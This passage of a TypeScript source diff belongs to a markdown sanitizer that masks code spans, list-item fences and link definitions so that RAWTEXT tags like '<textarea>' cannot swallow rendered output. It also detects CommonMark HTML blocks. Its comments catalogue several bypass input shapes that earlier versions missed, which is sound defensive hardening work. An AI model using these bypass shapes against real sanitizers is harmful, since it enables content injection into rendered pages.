+ return spliceWindows(masked, edits)
2610
+ }
2611
+
2612
+ /**
2613
+ * Blank code regions nested inside LIST ITEMS, the list-container analogue of
2614
+ * `blankQuotedCode` (round 14).
2615
+ *
2616
+ * `FENCE_RE` caps fence indent at 3 columns ABSOLUTE, but CommonMark measures a
2617
+ * fence's indent from the enclosing item's CONTENT COLUMN. Every list wrapper
2618
+ * the corpus swept had a content column of 2 or 3 (`- `, `1. `), so the cap
2619
+ * happened to cover them and the gap was invisible; at content column 4 or more
2620
+ * — `-` + three spaces, `1.` + three spaces, or the TAB spelling `-\t`, all
2621
+ * ordinary ways to write a list — a fenced code sample inside the item is seen
2622
+ * by NO pass. Its `</textarea>` then satisfied `hasLaterCloser`, and a prose
2623
+ * `<textarea>` above stayed LIVE and swallowed the rest of the message
2624
+ * (reproduced end-to-end at content columns 4 and 5 in BOTH the space and tab
2625
+ * spellings; `escapeUnknownHtmlTags` returned the input BYTE-IDENTICAL). The
2626
+ * same hole covers a BLOCKQUOTED fence inside such an item, since
2627
+ * `blankQuotedCode`'s own `BLOCKQUOTE_PREFIX_RE` is likewise anchored at
2628
+ * columns 0..3.
2629
+ *
2630
+ * Same shape as `blankQuotedCode`: strip the container prefix off each run of
2631
+ * lines that share a content column, then run the nested fence + indented scan
2632
+ * over the stripped content. The content-column stack is the one
2633
+ * `blankIndentedCode` keeps, INCLUDING CommonMark's `markerEnd + 1` clamp and
2634
+ * tab expansion, so the two passes cannot disagree about where an item's
2635
+ * content begins.
2636
+ *
2637
+ * FAIL DIRECTION: monotonic. Every pass it calls only ever blanks MORE of the
2638
+ * haystack, and more blanking means fewer visible closers, means more openers
2639
+ * escaped. So an over-detected run (a list marker written inside a fence
2640
+ * pushing a bogus column — the SCAN-SOURCE INVERSION `blankIndentedCode`
2641
+ * documents) costs at most a code sample rendered as escaped text.
2642
+ */
2643
+ function blankListItemCode(masked: string, lines: MaskLine[], depth = 0): string {
2644
+ const cols: number[] = []
2645
+ let run: MaskLine[] = []
2646
+ let runCol = 0
2647
+ // One edit per run, spliced in a SINGLE fold at the end — see `spliceWindows`.
2648
+ const edits: Array<[number, number, string]> = []
2649
+ const flush = () => {
2650
+ if (run.length === 0) return
2651
+ const [from, to] = runWindow(run)
2652
+ const wl = rebaseRun(run, from)
2653
+ let win = masked.slice(from, to)
2654
+ // Depth limit: blank the run WHOLE rather than recurse — see
2655
+ // `CONTAINER_NEST_LIMIT`. Fail-closed, never a skip.
2656
+ if (depth >= CONTAINER_NEST_LIMIT) {
2657
+ edits.push([from, to, blankRanges(win, [[0, win.length]])])
2658
+ run = []
2659
+ return
2660
+ }
2661
+ // The nested FENCE scan needs unmasked content; the nested INDENTED scan
2662
+ // needs the CURRENT mask — exactly `blankQuotedCode`'s split. The nested
2663
+ // QUOTED scan is needed too: `BLOCKQUOTE_PREFIX_RE` is anchored at columns
2664
+ // 0..3, so a quoted fence inside a column-4 item was missed by BOTH
2665
+ // containers' passes (`bq-in-col4-item`, reproduced live).
2666
+ const afterFences = blankFencedRegions(win, wl)
2667
+ win = blankIndentedCode(afterFences, remapToMask(afterFences, wl))
2668
+ win = blankLinkDefinitions(win, wl)
2669
+ if (wl.some(hasQuotePrefix)) win = blankQuotedCode(win, wl, depth + 1)
2670
+ // …and ITSELF, the symmetric counterpart of the `blankQuotedCode →
2671
+ // blankListItemCode` call above (round 19 — tenth instance of the fail-open
2672
+ // class). `LIST_MARKER_RE` is anchored at `^` and matches only the FIRST
2673
+ // marker on a line, so an INNER item's content column was never pushed and
2674
+ // a block opened on a nested marker line (`- - ```html`, `- - [a]: /x
2675
+ // "</textarea>"`) was cut to the OUTER item's column only — still short of
2676
+ // its own. Reproduced live for both shapes at zero quote depth
2677
+ // (`escapeUnknownHtmlTags` byte-identical, one live `<textarea>`, the
2678
+ // document below swallowed). Re-cutting the stripped run re-runs
2679
+ // `LIST_MARKER_RE` against content that now BEGINS at the outer item's
2680
+ // column, so the inner marker is the first one and its column is pushed.
2681
+ //
2682
+ // TERMINATION (self-recursion): every line put in a run is cut at
2683
+ // `charIndexAtColumn(content, top)` with `top >= 1`, which returns an index
2684
+ // `>= 1` (index 0 is only reachable for column 0), so EVERY member of the
2685
+ // run is strictly shorter than the line it came from. The measure
2686
+ // `M(run) = Σ line.content.length` from `blankQuotedCode`'s proof therefore
2687
+ // strictly decreases across this call exactly as it does across the
2688
+ // `blankQuotedCode` one — blank separators enter an already-open run as
2689
+ // `content: ''` (length 0 ≤ original) and never open one. `M` is a
2690
+ // non-negative integer, so the chain is finite; a run with no marker at all
2691
+ // pushes no column, leaves `top === 0`, opens no run and the recursion stops
2692
+ // one level down — which is exactly what `hasListMarker` short-circuits.
2693
+ if (wl.some(hasListMarker)) win = blankListItemCode(win, wl, depth + 1)
2694
+ edits.push([from, to, win])
2695
+ run = []
2696
+ }
2697
+ for (const line of lines) {
2698
+ // A blank line does not close a list item, so it stays in the run — the
2699
+ // nested tracker needs it to see the paragraph break. CommonMark's blank
2700
+ // line, not `trim()` (see `isBlankLine`).
2701
+ if (isBlankLine(line.content)) {
2702
+ if (run.length > 0) run.push({ ...line, content: '' })
2703
+ continue
2704
+ }
2705
+ const indent = leadingIndent(line.content)
2706
+ while (cols.length > 0 && indent < cols[cols.length - 1]) cols.pop()
2707
+ // THE MARKER LINE IS ITSELF ITEM CONTENT (round 18 — eighth instance of the
2708
+ // fail-open class). The marker used to be pushed AFTER the run-membership
2709
+ // decision, so `top` was read from the enclosing state and the marker line
2710
+ // NEVER entered a run — the run began on the line BELOW it. A block opened
2711
+ // ON the marker line (`- ```html`, `1. ```html`, `-\t```html`,
2712
+ // `> - ```html`) was therefore seen by no pass at all: `FENCE_RE` caps
2713
+ // fence indent at 3 ABSOLUTE columns so the top-level tracker misses it, and
2714
+ // `blankIndentedCode`'s `contentCol + 4` threshold overshoots it. Worse, the
2715
+ // run then STARTED after the opener, so the item's CLOSING fence read as an
2716
+ // `open` to the nested tracker, which blanked to EOF while leaving the code
2717
+ // BODY — and its `</textarea>` — live in the haystack. Reproduced at ZERO
2718
+ // nesting depth (`escapeUnknownHtmlTags` returned the input BYTE-IDENTICAL,
2719
+ // one live editable `<textarea>` swallowing the prose above it), for both
2720
+ // textarea and iframe and at every marker spelling.
2721
+ //
2722
+ // Pushing the marker first makes `top` the column this line's own content
2723
+ // starts at, so `charIndexAtColumn(content, top)` cuts exactly at the marker
2724
+ // (`marker[0].length`, or `markerEnd + 1` under the clamp) and hands the
2725
+ // nested tracker precisely the item content.
2726
+ //
2727
+ // TERMINATION IS UNCHANGED: `top >= 4` still implies `cut >= 1` (the cut
2728
+ // index can only be 0 when the requested column is 0), so every line put in
2729
+ // a run still strictly shortens and the measure `M(run)` in
2730
+ // `blankQuotedCode`'s termination proof still strictly decreases.
2731
+ const marker = LIST_MARKER_RE.exec(line.content)
2732
+ if (marker) {
2733
+ const markerEndCol = visualColumn(line.content, marker[0].length - marker[2].length)
2734
+ const contentCol = visualColumn(line.content, marker[0].length)
2735
+ cols.push(contentCol - markerEndCol > 4 ? markerEndCol + 1 : contentCol)
2736
+ }
2737
+ const top = cols.length > 0 ? cols[cols.length - 1] : 0
2738
+ if (top !== runCol) {
2739
+ flush()
2740
+ runCol = top
2741
+ }
2742
+ // EVERY list item is re-scanned at its own content column (round 19 — ninth
2743
+ // instance of the fail-open class). The gate used to be `top >= 4`, on the
2744
+ // claim that "below column 4 the top-level passes already cover the line at
2745
+ // the right column". That is true for a CONTINUATION line — its absolute
2746
+ // indent of 2 or 3 falls inside `FENCE_RE`'s 0..3 cap — and FALSE for the
2747
+ // MARKER LINE, which the top-level passes examine only at column 0, where
2748
+ // the leading `- ` / `1. ` is not whitespace so `FENCE_RE` cannot match and
2749
+ // `blankIndentedCode`'s `contentCol + 4` overshoots. At content column 2 or
2750
+ // 3 — `- ` and `1. `, the two MOST COMMON spellings — the gate then denied
2751
+ // the marker line any run at all and no pass examined it. Reproduced live
2752
+ // for `- ```html` / `1. ```html` / the `<iframe>` spelling, EOF-terminated
2753
+ // (`escapeUnknownHtmlTags` byte-identical, one live RAWTEXT element, the
2754
+ // document below swallowed); the closed-fence spelling is rescued only
2755
+ // INCIDENTALLY by `findInlineCodeRanges` matching the two backtick runs.
2756
+ //
2757
+ // Round 18 fixed WHERE the column is pushed (the marker line now joins the
2758
+ // run) but kept a gate whose justification was untrue one column-range
2759
+ // lower. The gate was an unforced optimization: the pass is documented
2760
+ // monotonic, so re-scanning narrow items can only blank MORE, and
2761
+ // termination is unaffected (`top >= 1` still implies `cut >= 1`).
2762
+ if (top >= 1) {
2763
+ const cut = charIndexAtColumn(line.content, top)
2764
+ if (cut < 0) {
2765
+ flush()
2766
+ runCol = 0
2767
+ } else {
2768
+ run.push({
2769
+ start: line.start,
2770
+ contentStart: line.contentStart + cut,
2771
+ content: line.content.slice(cut),
2772
+ })
2773
+ }
2774
+ }
2775
+ }
2776
+ flush()
2777
+ return spliceWindows(masked, edits)
2778
+ }
2779
+
2780
+ /**
2781
+ * Build the haystack `hasLaterCloser` searches: a LENGTH-PRESERVING lowercased
2782
+ * copy of the document with every region that cannot contain a REAL closing
2783
+ * tag blanked to spaces.
2784
+ *
2785
+ * Why this exists: the escaping pass carefully carves code out, but the
2786
+ * closer search used to run over the RAW document. So a `</textarea>` sitting
2787
+ * inside a code fence, an inline-code span, or another tag's attribute string
2788
+ * satisfied "is closed later", the prose opener was left LIVE, and parse5's
2789
+ * RAWTEXT span swallowed the rest of the message anyway — the whole fix was
2790
+ * one code sample away from being bypassed, which is exactly what an LLM
2791
+ * answer about HTML looks like.
2792
+ *
2793
+ * Masking (rather than deleting) keeps every index identical to the original
2794
+ * string, so the caller's offset arithmetic is unchanged. THE LENGTH
2795
+ * INVARIANT IS LOAD-BEARING — see `foldAsciiCase`.
2796
+ *
2797
+ * CARVE DECISION (deliberate, do not "unify"): these tracker-derived regions
2798
+ * are NOT fed to the escaping carve, even though that would stop an authored
2799
+ * EOF-terminated fence body from rendering as literal `&lt;their&gt;`.
2800
+ *
2801
+ * The genuine asymmetry is the EOF-TERMINATED fence, and only that one. The
2802
+ * tracker protects an unclosed opener all the way to end of input, so a single
2803
+ * stray ``` line — mid-stream, or inside an open raw-HTML block where a ```
2804
+ * line is content rather than a fence — would carve the ENTIRE remainder of the
2805
+ * document out of the escaping pass. `PROTECTED_SPAN_RE` protects nothing at
2806
+ * all there (it only recognizes a fence CLOSED by a same-marker run), so its
2807
+ * failure mode is bounded: a code sample renders as escaped text. In the carve
2808
+ * an over-detected region is a region that is NOT escaped — a fail-OPEN, i.e.
2809
+ * exactly the swallow this module exists to prevent — so the materially larger
2810
+ * fail-open surface decides it.
2811
+ *
2812
+ * SHARED over-detection (e.g. a ``` line inside an HTML block — `<div>`,
2813
+ * `<pre>`, `<details>` — where CommonMark says the line is HTML content, not a
2814
+ * fence) was previously dismissed here as "not an argument either way". THAT
2815
+ * WAS WRONG: it is precisely the residual fail-open. The intersection guard
2816
+ * below only reconciles DISAGREEMENT, so when BOTH engines open the same bogus
2817
+ * fence the guard is a no-op and a live `<textarea>` inside it is pushed
2818
+ * verbatim, swallowing the rest of the message (reproduced for all three tags).
2819
+ * What actually closes it is the CARVE BALANCE GUARD in
2820
+ * `escapeUnknownHtmlTags`: a protected span may contain no UNBALANCED RAWTEXT
2821
+ * opener. Neither engine needs to learn about HTML blocks for that to hold.
2822
+ *
2823
+ * What makes keeping two engines SAFE is therefore the pair of guards in
2824
+ * `escapeUnknownHtmlTags`: a carve span the mask did not blank is escaped
2825
+ * rather than pushed through verbatim, and a span carrying an unbalanced
2826
+ * RAWTEXT opener is escaped even when both engines agree. Over-detection can
2827
+ * then only cost cosmetics. Before the first guard the regex's info-string-tolerant
2828
+ * closer let it desync and open a span from a line CommonMark treats as
2829
+ * ordinary text, sheltering a live `<textarea>` from escaping entirely
2830
+ * (`mismatched-fence-carve-does-not-shelter-opener`). The remaining tradeoff is
2831
+ * pinned by `unclosed-fence-body-renders-escaped` rather than left as prose.
2832
+ */
2833
+ function buildCloserHaystack(text: string): string {
2834
+ const folded = foldAsciiCase(text)
2835
+ const lines = toMaskLines(folded)
2836
+ // 1. Inline code spans (the only non-line-state code region). Uncapped and
2837
+ // backtracking-free — see `findInlineCodeRanges`; an over-cap span used to
2838
+ // be skipped entirely and sheltered a live RAWTEXT opener.
2839
+ let masked = blankRanges(folded, findInlineCodeRanges(folded))
2840
+ // 2. Every BLOCK-level code form, derived from line state over `folded`:
2841
+ // fences (tracker-accurate, closed and EOF-terminated alike), indented
2842
+ // code, blockquoted code, and HTML comments. Each of these carried a
2843
+ // reproduced live-textarea swallow before it was masked.
2844
+ masked = blankFencedRegions(masked, lines)
2845
+ // The indented pass walks the CURRENT mask (not `folded`) so a list marker
2846
+ // written inside a fence cannot shift its content-column stack — see its
2847
+ // SCAN-SOURCE INVERSION note. `blankQuotedCode` still gets the unmasked
2848
+ // lines because its NESTED fence scan needs them, and applies the same
2849
+ // inversion internally.
2850
+ masked = blankIndentedCode(masked, remapToMask(masked, lines))
2851
+ // …and LINK REFERENCE DEFINITIONS, which remark consumes whole and emits
2852
+ // nothing for, so a `</textarea>` in a destination or title is not a closer.
2853
+ masked = blankLinkDefinitions(masked, lines)
2854
+ // …and the GFM FOOTNOTE definitions that pass deliberately refuses, but only
2855
+ // the UNREFERENCED ones: remark-gfm drops those whole, so their bodies are
2856
+ // not document text either. It reads the CURRENT mask for DEFINITIONS and a
2857
+ // separate, more-blanked copy for REFERENCES (`footnoteReferenceMask`), both
2858
+ // behind a `[^` guard.
2859
+ //
2860
+ // ITS SLOT IS CONSTRAINED ON BOTH SIDES, and neither bound is cosmetic:
2861
+ // · it may not run EARLIER than the code passes, whose output is the
2862
+ // definition source;
2863
+ // · it may not simply be MOVED after `blankInlineLinkPayloads` /
2864
+ // `blankBracketLabels` to pick up the phantom-reference fix, because
2865
+ // `blankBracketLabels` blanks footnote labels "reference AND definition
2866
+ // alike" — after it, EVERY reference is gone and every referenced
2867
+ // definition would be over-blanked into escaped source. Hence the
2868
+ // separate scratch copy instead of a reorder.
2869
+ masked = blankUnreferencedFootnotes(masked, lines, folded)
2870
+ // …and the INLINE link/image spelling of the same shelter, which remark
2871
+ // likewise turns into href/title attributes. Container-agnostic, so like
2872
+ // the definition pass it needs exactly one top-level call.
2873
+ masked = blankInlineLinkPayloads(masked, folded)
2874
+ // …and the BRACKET half of that same class — an image's alt, a reference
2875
+ // label, a footnote label — which remark consumes into an attribute or an
2876
+ // identifier. Container-agnostic, so likewise exactly one top-level call.
2877
+ masked = blankBracketLabels(masked, folded)
2878
+ masked = blankQuotedCode(masked, lines)
2879
+ // …and the LIST-container analogue, for items whose content column exceeds
2880
+ // the 3-column fence-indent cap. Monotonic, so its position among the
2881
+ // block passes is not load-bearing.
2882
+ masked = blankListItemCode(masked, lines)
2883
+ // Comments scan the MASKED copy, not `folded` — see `blankComments`. Must
2884
+ // stay LAST: it relies on every code region already being blanked.
2885
+ masked = blankComments(masked, masked)
2886
+ // 3. Attribute regions. Blanking the WHOLE tag would blank real `</tag>`
2887
+ // closers too (and break the closed-form fixtures), so only the
2888
+ // attribute run between the tag name and the `>` is cleared.
2889
+ masked = blankTagAttributes(masked)
2890
+ return masked
2891
+ }
2892
+
2893
+ /** Exported for the length-preservation invariant test only. */
2894
+ export const __buildCloserHaystackForTest = buildCloserHaystack
2895
+
2896
+ /**
2897
+ * True when a well-formed `</tag>` (optional trailing whitespace) occurs at
2898
+ * or after `from` in the MASKED lowercased source (see `buildCloserHaystack`).
2899
+ * Substring search rather than a per-tag `RegExp` — the tag comes from
2900
+ * `RAWTEXT_TAGS`, but building regexes from tag names in a hot path invites
2901
+ * an injection footgun on the next edit.
2902
+ */
2903
+ function hasLaterCloser(lowerSource: string, tag: string, from: number): boolean {
2904
+ const needle = `</${tag}`
2905
+ let cursor = from
2906
+ for (;;) {
2907
+ const at = lowerSource.indexOf(needle, cursor)
2908
+ if (at === -1) return false
2909
+ // Only `</tag>` or `</tag >` closes it; `</tagfoo>` is a different tag.
2910
+ if (/^\s*>/.test(lowerSource.slice(at + needle.length, at + needle.length + 64)))
2911
+ return true
2912
+ cursor = at + needle.length
2913
+ }
2914
+ }
2915
+
2916
+ /**
2917
+ * True when the mask considers `[from, to)` entirely code — every character
2918
+ * blanked to a space (newlines are never blanked, so they count as blank).
2919
+ * Both strings are the same length by construction (see `foldAsciiCase`).
2920
+ */
2921
+ function isMaskedBlank(lowerSource: string, from: number, to: number): boolean {
2922
+ for (let i = from; i < to; i++) {
2923
+ const c = lowerSource[i]
2924
+ if (c !== ' ' && c !== '\n') return false
2925
+ }
2926
+ return true
2927
+ }
2928
+
2929
+ /**
2930
+ * True when `span` contains a RAWTEXT opener with no matching closer INSIDE
2931
+ * the span — the self-containment test the carve applies before pushing a
2932
+ * protected span through verbatim. See the CARVE BALANCE GUARD in
2933
+ * `escapeUnknownHtmlTags`.
2934
+ *
2935
+ * A closer with no opener before it is harmless (it cannot start a RAWTEXT
2936
+ * span), so the counter floors at zero rather than going negative.
2937
+ *
2938
+ * SELF-CLOSING IS AN OPENER (round 11). HTML ignores the self-closing flag on
2939
+ * non-void, non-foreign elements, so parse5 tokenizes `<textarea/>` as a START
2940
+ * tag and enters RAWTEXT exactly like `<textarea>`. Keying on `selfClose === ''`
2941
+ * therefore made this guard — and the closer check in `escapeOutsideFences` —
2942
+ * blind to the self-closed spelling of EVERY shape they defend against; the
2943
+ * round-9 HTML-block fixtures passed only because they used the bare spelling.
2944
+ * See the matching note on `escapeOutsideFences` for the one cosmetic cost.
2945
+ */
2946
+ function hasUnbalancedRawtextOpener(span: string): boolean {
2947
+ if (span.indexOf('<') === -1) return false
2948
+ const open = new Map<string, number>()
2949
+ TAG_LIKE_REGEX.lastIndex = 0
2950
+ let m: RegExpExecArray | null
2951
+ while ((m = TAG_LIKE_REGEX.exec(span)) !== null) {
2952
+ const [, slash, tag] = m
2953
+ const lower = tag.toLowerCase()
2954
+ if (!RAWTEXT_TAGS.has(lower)) continue
2955
+ if (slash === '') {
2956
+ open.set(lower, (open.get(lower) ?? 0) + 1)
2957
+ } else {
2958
+ open.set(lower, Math.max(0, (open.get(lower) ?? 0) - 1))
2959
+ }
2960
+ }
2961
+ for (const count of open.values()) if (count > 0) return true
2962
+ return false
2963
+ }
2964
+
2965
+ /**
2966
+ * ---------------------------------------------------------------------------
2967
+ * CommonMark HTML BLOCK ranges — the property the CARVE BALANCE GUARD gates on
2968
+ * ---------------------------------------------------------------------------
2969
+ * The guard exists because a protected span sitting inside an HTML BLOCK is not
2970
+ * really code: CommonMark says an HTML block runs to its own terminator, so
2971
+ * every line inside it is HTML CONTENT. Round 9 discovered that through the
2972
+ * FENCE spelling (a ``` line inside `<div>` is content, but both fence engines
2973
+ * call it a fence and shelter what follows). Round 11 then scoped the guard to
2974
+ * fences — and reopened the identical hole through INLINE CODE, whose
2975
+ * "an inline span can shelter nothing, remark emits it as an `inlineCode` TEXT
2976
+ * node" justification is precisely the invariant that fails inside an HTML
2977
+ * block, where remark emits raw HTML and backticks are not code at all.
2978
+ *
2979
+ * Gating on the span's FLAVOR was therefore the wrong property in both
2980
+ * directions. This walk supplies the right one: HTML-block membership, which
2981
+ * covers both spellings, while `` Use the `<title>` element `` in ordinary
2982
+ * prose keeps rendering verbatim (round 11's regression stays fixed).
2983
+ *
2984
+ * FAIL DIRECTION: a detected range only makes the guard ESCAPE a span, and
2985
+ * escaping inside a GENUINE HTML block is invisible (the surrounding content is
2986
+ * raw HTML, where `&lt;` is decoded as `<`). Over-detection is therefore
2987
+ * cosmetic ONLY when we are wrong about the block — so the walk tracks
2988
+ * CommonMark closely rather than blanket-detecting.
2989
+ *
2990
+ * START CONDITIONS IMPLEMENTED: all seven (1 `<script|pre|style|textarea`,
2991
+ * 2 `<!--`, 3 `<?`, 4 `<!LETTER`, 5 `<![CDATA[`, 6 the known block-tag list,
2992
+ * 7 a complete open/closing tag ALONE on its line). Condition 7 is the one that
2993
+ * needs paragraph state — it alone cannot interrupt a paragraph — and it is NOT
2994
+ * omissible: `<span>` is outside both the type-1 and type-6 tag lists, so
2995
+ * dropping 7 would leave `` <span>\n`<textarea>`\n</span> `` sheltering a live
2996
+ * opener (verified end-to-end before this walk existed). Paragraph state is
2997
+ * approximated by "the previous line was ordinary text", which is exact for the
2998
+ * shapes 7 cares about; where it errs it errs toward NOT being in a paragraph,
2999
+ * i.e. toward detecting a block, i.e. toward escaping.
3000
+ *
3001
+ * This walk is deliberately SEPARATE from the mask's line walk. The mask is the
3002
+ * closer-search security boundary and currently over-blanks a ``` line inside an
3003
+ * HTML block (fail-CLOSED there); teaching it about HTML blocks would UNBLANK
3004
+ * that region and turn a code-sample `</textarea>` into a live closer — the
3005
+ * fail-OPEN direction. Same line-state concept, opposite fail directions, so
3006
+ * they stay two walks.
3007
+ */
3008
+ interface HtmlBlockRange {
3009
+ start: number
3010
+ end: number
3011
+ }
3012
+
3013
+ /** CommonMark start-condition 6 tag list (verbatim from the spec). */
3014
+ const HTML_BLOCK_TYPE_6_TAGS = new Set([
3015
+ 'address', 'article', 'aside', 'base', 'basefont', 'blockquote', 'body',
3016
+ 'caption', 'center', 'col', 'colgroup', 'dd', 'details', 'dialog', 'dir',
3017
+ 'div', 'dl', 'dt', 'fieldset', 'figcaption', 'figure', 'footer', 'form',
3018
+ 'frame', 'frameset', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'head', 'header',
3019
+ 'hr', 'html', 'iframe', 'legend', 'li', 'link', 'main', 'menu', 'menuitem',
3020
+ 'nav', 'noframes', 'ol', 'optgroup', 'option', 'p', 'param', 'search',
3021
+ 'section', 'summary', 'table', 'tbody', 'td', 'tfoot', 'th', 'thead',
3022
+ 'title', 'tr', 'track', 'ul',
3023
+ ])
3024
+
3025
+ const HTML_BLOCK_START_1 = /^ {0,3}<(?:script|pre|style|textarea)(?:[ \t>]|\r?$)/i
3026
+ const HTML_BLOCK_END_1 = /<\/(?:script|pre|style|textarea)>/i
3027
+ const HTML_BLOCK_START_2 = /^ {0,3}<!--/
3028
+ const HTML_BLOCK_START_3 = /^ {0,3}<\?/
3029
+ const HTML_BLOCK_START_4 = /^ {0,3}<![a-zA-Z]/
3030
+ const HTML_BLOCK_START_5 = /^ {0,3}<!\[CDATA\[/
3031
+ const HTML_BLOCK_START_6 = /^ {0,3}<(\/?)([a-zA-Z][a-zA-Z0-9-]{0,63})(?:[ \t]|\/?>|\r?$)/
3032
+ /** A COMPLETE open or closing tag, alone on its line. Attribute run bounded for
3033
+ * the same ReDoS reason as `TAG_LIKE_REGEX`. */
3034
+ const HTML_BLOCK_START_7 =
3035
+ /^ {0,3}(?:<[a-zA-Z][a-zA-Z0-9-]{0,63}(?:\s[^>]{0,4096}?)?\/?>|<\/[a-zA-Z][a-zA-Z0-9-]{0,63}[ \t]{0,64}>)[ \t]*\r?$/
3036
+ /** Lines that are NOT ordinary paragraph text (so condition 7 may start after
3037
+ * them). A lone tag line is deliberately ABSENT: under CommonMark it cannot
3038
+ * interrupt a paragraph, so it continues one. */
3039
+ const NON_PARAGRAPH_LINE_RE =
3040
+ /^ {0,3}(?:#{1,6}(?:[ \t]|\r?$)|>|[-*+](?:[ \t]|\r?$)|\d{1,9}[.)](?:[ \t]|\r?$)|`{3,}|~{3,}|=+[ \t]*\r?$|(?:[-*_][ \t]*){3,}\r?$)/
3041
+
3042
+ /**
3043
+ * CONTAINER NORMALIZATION (round 13). Every start/end condition above is
3044
+ * anchored `^ {0,3}<…` and used to be matched against the RAW line, so inside a
3045
+ * BLOCKQUOTE or a LIST ITEM none of them ever fired — `> <div>` / `- <div>`
3046
+ * looked like ordinary text. CommonMark opens the block INSIDE the container, so
3047
+ * every following line is HTML content; the walk missed the whole range, the
3048
+ * balance guard stayed blind, and `` > `<textarea>` `` was pushed through
3049
+ * VERBATIM (`escapeUnknownHtmlTags` returned the input byte-identical).
3050
+ *
3051
+ * Detection here only ever causes ESCAPING, so a CONSERVATIVE strip is enough
3052
+ * and no container-stack model is needed: stripping more than CommonMark would
3053
+ * can only over-detect, and over-detection inside a genuine HTML block is
3054
+ * invisible (see FAIL DIRECTION above), while under-detection is the swallow.
3055
+ *
3056
+ * WHAT THIS MODELS: any run of blockquote markers (`>` with up to 3 spaces of
3057
+ * indent and one optional space after), then at most one list marker
3058
+ * (`-`/`*`/`+`/`1.`/`1)` plus its following spaces), then — for CONTINUATION
3059
+ * lines — up to `listContentCol` columns of leading whitespace, where
3060
+ * `listContentCol` is the width of the most recent list marker seen at the
3061
+ * current level.
3062
+ *
3063
+ * WHAT IT DOES NOT MODEL, and why the residual is fail-CLOSED:
3064
+ * - It keeps NO container stack, so it cannot tell a lazy-continuation line
3065
+ * from a line that genuinely left the container, and it does not verify that
3066
+ * a stripped prefix matches the prefix the enclosing block actually opened
3067
+ * with. Both errors strip TOO MUCH, i.e. detect MORE blocks, i.e. escape.
3068
+ * - `listContentCol` takes the literal marker width and does NOT apply
3069
+ * CommonMark's clamp to `markerEnd + 1` when the first block starts more than
3070
+ * 4 spaces after the marker. Under `-` + six spaces the real content column
3071
+ * is 2 and the remainder is indented code INSIDE the item; we strip 7 and may
3072
+ * call an indented-code line a block start. Again: more detection.
3073
+ * - TERMINATION strips by prefix WIDTH, not by prefix IDENTITY (see the
3074
+ * `blank` computation): a line carrying a different container's marker
3075
+ * within the opening line's prefix width and nothing after it still reads as
3076
+ * blank. That shape is a lone container marker at or left of the opening
3077
+ * content column, which under CommonMark closes the enclosing container (and
3078
+ * with it the HTML block) anyway — so the two agree on every shape checked.
3079
+ * It is the ONE bullet here whose error direction is under-detection, and it
3080
+ * is why the width is taken from the OPENING line rather than from a greedy
3081
+ * re-strip of each line.
3082
+ * - Offsets are NOT rewritten: `start` / `lastEnd` stay in the ORIGINAL
3083
+ * coordinate space (the stripped prefix is discarded, never subtracted), so
3084
+ * the ranges remain valid for the caller's overlap test. Line-granular
3085
+ * coordinates are sufficient there — `spanInsideHtmlBlock` only asks whether
3086
+ * a span intersects a range.
3087
+ *
3088
+ * TABS ARE EXPANDED TO 4-COLUMN STOPS FIRST (round 14). Every measurement here
3089
+ * is a COLUMN count, and CommonMark measures columns, so the walk cannot be fed
3090
+ * raw characters. Round 13 admitted the gap as a bounded residual and argued it
3091
+ * was fail-CLOSED; that argument was WRONG and the residual was exploitable.
3092
+ * `-\t-\tfoo` opens a list item whose real content column is 8 (each tab
3093
+ * advances to the next multiple of 4), but the character count is 4, so a
3094
+ * continuation line indented 8 spaces was stripped by only 4 and still looked
3095
+ * indented by 4 — `^ {0,3}<…` missed, `kind` stayed `null`, no range was
3096
+ * recorded, the balance guard never fired, and a live `<iframe>` / a swallowing
3097
+ * `<textarea>` reached the DOM inside a protected span (`escapeUnknownHtmlTags`
3098
+ * returned the input BYTE-IDENTICAL). `expandTabs` closes it: after expansion
3099
+ * the line contains no tabs at all, so `^ {0,3}` and every `[ \t]` class below
3100
+ * see true columns. Its arithmetic is the same 4-column stop rule as the mask's
3101
+ * `visualColumn`, so the two walks agree on what a column is.
3102
+ *
3103
+ * The blockquote half reuses `BLOCKQUOTE_PREFIX_RE` — the mask's existing
3104
+ * blockquote-stripping SSOT — so the two walks agree on what a quote marker is.
3105
+ */
3106
+ const LIST_MARKER_PREFIX_RE = /^[ \t]{0,3}(?:[-*+]|\d{1,9}[.)])(?:[ \t]{1,64}|\r?$)/
3107
+
3108
+ /** Expand tabs to 4-column tab stops, so character offsets in the result ARE
3109
+ * columns. Same stop rule as `visualColumn` (the mask's SSOT for this). */
3110
+ function expandTabs(s: string): string {
3111
+ if (s.indexOf('\t') === -1) return s
3112
+ let out = ''
3113
+ for (const ch of s) out += ch === '\t' ? ' '.repeat(4 - (out.length % 4)) : ch
3114
+ return out
3115
+ }
3116
+
3117
+ interface NormalizedLine {
3118
+ /** The line with its container prefix removed (start/end conditions match this). */
3119
+ text: string
3120
+ /** Content column of a list marker this line OPENED, or -1 if it opened none. */
3121
+ openedListCol: number
3122
+ }
3123
+
3124
+ /** `rawLine` is expanded to column stops FIRST, so every length taken below is a
3125
+ * column count. Callers that compare against the input must compare against
3126
+ * `expandTabs(rawLine)`, not `rawLine` — see `computeHtmlBlockRanges`. */
3127
+ function stripContainerPrefix(rawLine: string, listContentCol: number): NormalizedLine {
3128
+ const line = expandTabs(rawLine)
3129
+ let rest = line
3130
+ let openedListCol = -1
3131
+ // The enclosing item's continuation indent, consumable ONCE.
3132
+ let indentBudget = listContentCol
3133
+ // Containers nest in either order (`- > <div>`, `> - <div>`), so alternate
3134
+ // until nothing more is consumed. Bounded so a pathological line of markers
3135
+ // cannot make this super-linear.
3136
+ for (let depth = 0; depth < 16; depth++) {
3137
+ const bq = BLOCKQUOTE_PREFIX_RE.exec(rest)
3138
+ if (bq !== null && bq[0].length > 0) {
3139
+ rest = rest.slice(bq[0].length)
3140
+ if (openedListCol >= 0) openedListCol = line.length - rest.length
3141
+ continue
3142
+ }
3143
+ const li = LIST_MARKER_PREFIX_RE.exec(rest)
3144
+ if (li !== null) {
3145
+ rest = rest.slice(li[0].length)
3146
+ openedListCol = line.length - rest.length
3147
+ continue
3148
+ }
3149
+ // Continuation line of the open list item: drop up to the content column of
3150
+ // leading whitespace (never more, and never non-whitespace) — then KEEP
3151
+ // PEELING. Round 13 consumed this indent after the loop and returned, so a
3152
+ // container opened INSIDE the item (`-\\t> <div>` continued by ` > <div>`)
3153
+ // kept its `>` and no start condition could match: the range was missed and
3154
+ // the balance guard went blind, exactly the round-13 symptom one level down.
3155
+ // Both markers are anchored `^ {0,3}`, so the indent MUST come off first for
3156
